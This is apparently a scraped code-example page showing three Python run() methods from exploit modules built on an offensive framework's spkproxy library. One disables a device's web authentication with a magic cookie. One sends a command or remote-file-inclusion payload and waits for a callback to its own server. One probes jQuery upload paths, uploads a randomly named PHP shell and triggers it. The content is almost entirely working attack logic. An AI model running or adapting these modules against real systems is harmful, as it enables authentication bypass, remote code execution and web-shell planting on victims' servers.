            self.log_info("Attacking %s:%d" % (self.host, self.port))
            #self.log("Basic Auth User: %s"%self.basicauth_user)
            #self.log("VHost: %s"%self.hostname)
            if self.ssl:
                protocol = "https"
            else:
                protocol = "http"

            #If we have to do basic-auth, let's get an object from spkproxy here
            if self.basicauth_user:
                auth = spkproxy.BasicAuth(self.basicauth_user,
                                          self.basicauth_password)
            else:
                auth = None
            requestString = protocol + "://" + self.host + ":%s" % self.port + self.basepath
            self.log("RequestString: %s" % requestString)

            UA = spkproxy.UserAgent(requestString,
                                    auth=auth,
                                    hostname=self.hostname,
                                    exploit=self)

            UA.SetCookie(
                self.magicCookie_name,
                self.magicCookie_val)  # to clear the authentigation flag.
            self.log("Cookie: " + self.magicCookie_name + "=" +
                     self.magicCookie_val)
            self.setProgress(50)

            # To-do: Handle enable/disable separatedly
            #
            #UA.SetCookie(self.magicCookie_name,self.magicCookie_val+1) # to restore authentication flag.
            #self.log("Cookie: "+self.magicCookie_name+"="+self.magicCookie_val)

            data = UA.GET("")
            self.setProgress(70)
            if "status/status_deviceinfo" in data:
                self.log("Authentication successfully disabled!")
                self.log("You can now access web interface without password.")
                self.setProgress(100)
                ret = 1
            else:
                if "Protected Object" in data:
                    self.log("Exploit did not work. Wrong offsets?")
                ret = 0

            if ret:
                self.setInfo("%s attacking %s:%d - done (success!)" %
                             (NAME, self.host, self.port))
            else:
                self.setInfo("%s attacking %s:%d - done (failed)" %
                             (NAME, self.host, self.port))
            return ret
Ejemplo n.º 29
0
    def run(self):
        self.getargs()

        self.setInfo("%s attacking %s:%d (in progress)" %
                     (self.name, self.host, self.port))
        self.log("Using version: %s" % self.version)
        if self.version == 0:
            ret = self.test()
            if not ret:
                self.setInfo(
                    "%s against %s:%d (failed: didn't find vulnerable target!)"
                    % (self.name, self.host, self.port))
                self.log("Testing didn't find vulnerable target")
                return 0
        if not self.hostname:
            self.hostname = self.host

        self.log("Attacking %s:%d" % (self.host, self.port))
        self.log("Basic Auth User: %s" % self.basicauth_user)
        self.log("VHost: %s" % self.hostname)

        #setup our UA first
        if self.ssl:
            protocol = "https"
        else:
            protocol = "http"

        #If we have to do basic-auth, let's get an object from spkproxy here
        if self.basicauth_user:
            auth = spkproxy.BasicAuth(self.basicauth_user,
                                      self.basicauth_password)
        else:
            auth = None

        targetstring = protocol + "://" + self.hostname + ":" + str(
            self.port) + self.basepath
        self.log("Targetstring: %s" % targetstring)
        self.ua = spkproxy.UserAgent(targetstring,
                                     auth=auth,
                                     hostname=self.hostname,
                                     exploit=self)

        if hasattr(self, "content_type"):
            self.ua.addHeader("Content-Type", self.content_type)

        if self.webserverport:
            self.set_up_webserver()
            noresponse = True

        noresponse = True
        if self.command:
            #we do get the response if we are sending it a command
            noresponse = False

        if self.verb == "POST":
            body = self.getbody()
            self.log("POSTING data of length %s" % len(body))
            data = self.ua.POST(
                self.targetpath, body, noresponse=noresponse
            )  #fix noresponce in POST noresponse=noresponse
        elif self.verb == "GET":
            data = self.ua.GET(self.targetpath + "?" + self.geturlarguments(),
                               noresponse=noresponse)

        if self.command and data:
            blah = self.parse_command_response(data)

        if self.webserverport:
            #let's accept a connection if this is an RFI exploit
            #we should have timed out on the top connection
            ret = self.server.accept()
            if ret:
                self.log("Found callback to our web server: %s!" % ret)
        else:
            self.log("Recved result of: %s" % data)

        ret = self.ISucceeded()

        return ret
Ejemplo n.º 30
0
    def run(self):
        self.getargs()
        #test = self.test()
        self.setInfo("%s attacking %s:%d (in progress)" %
                     (NAME, self.hostname, self.port))
        logging.info("Attacking %s:%d" % (self.hostname, self.port))
        logging.info("VHost: %s" % self.hostname)

        if self.ssl:
            protocol = "https"
        else:
            protocol = "http"

        auth = None
        if self.basicauth_user != "":
            auth = spkproxy.BasicAuth(self.basicauth_user,
                                      self.basicauth_password)

        fname_shell = randomstring(
            16
        ) + ".php"  #''.join(random.choice(string.ascii_letters) for _ in range(16)) #
        fname_multipart_data = self.getfile(fname_shell)
        found_path = False
        useragentstring = ''
        vulnerable_path = ''
        for jquery_path in self.jquery_paths:
            useragentstring = protocol + "://" + self.host + ":" + str(
                self.port) + "/" + self.basepath
            UA = spkproxy.UserAgent(useragentstring,
                                    auth=auth,
                                    hostname=self.hostname,
                                    exploit=self)
            for vulpath in self.vulnpaths:
                UA.addHeader(
                    "Content-Type",
                    "multipart/form-data; boundary=---------------------------3922242971797626524322043819"
                )
                vulnerable_path = jquery_path + vulpath
                logging.info(
                    "Checking for vulnerable path: {}".format(useragentstring +
                                                              vulnerable_path))
                response, response_code = UA.POST(vulnerable_path,
                                                  fname_multipart_data,
                                                  return_response_code=True)
                if response_code == 200:
                    found_path = True
                    break

                vulnerable_path = jquery_path + vulpath + "/" + randomstring(
                    10)
                logging.info(
                    "Checking for vulnerable path: {}".format(useragentstring +
                                                              vulnerable_path))
                response, response_code = UA.POST(vulnerable_path,
                                                  fname_multipart_data,
                                                  return_response_code=True)
                if response_code == 200:
                    found_path = True
                    break

            if found_path:
                logging.warning(
                    "Found vulnerable path: {}".format(useragentstring +
                                                       vulnerable_path))
                break

        # Wait for the upload
        time.sleep(3)
        ret = 0
        if found_path:
            UA.clearHeaders()
            for upload_path in self.upload_paths:
                test_path = jquery_path + upload_path + fname_shell
                logging.info("Triggering our uploaded callback: {}".format(
                    useragentstring + test_path))
                UA.GET(test_path, noresponse=True)
                for i in xrange(0, 5):  #wait five seconds for callback
                    time.sleep(1)
                    ret = self.ISucceeded()
                    if ret:
                        break

                if ret:
                    break

        if ret:
            self.setInfo("%s attacking %s:%d - done (success!)" %
                         (NAME, self.host, self.port))
        else:
            self.setInfo("%s attacking %s:%d - done (failed)" %
                         (NAME, self.host, self.port))

        return ret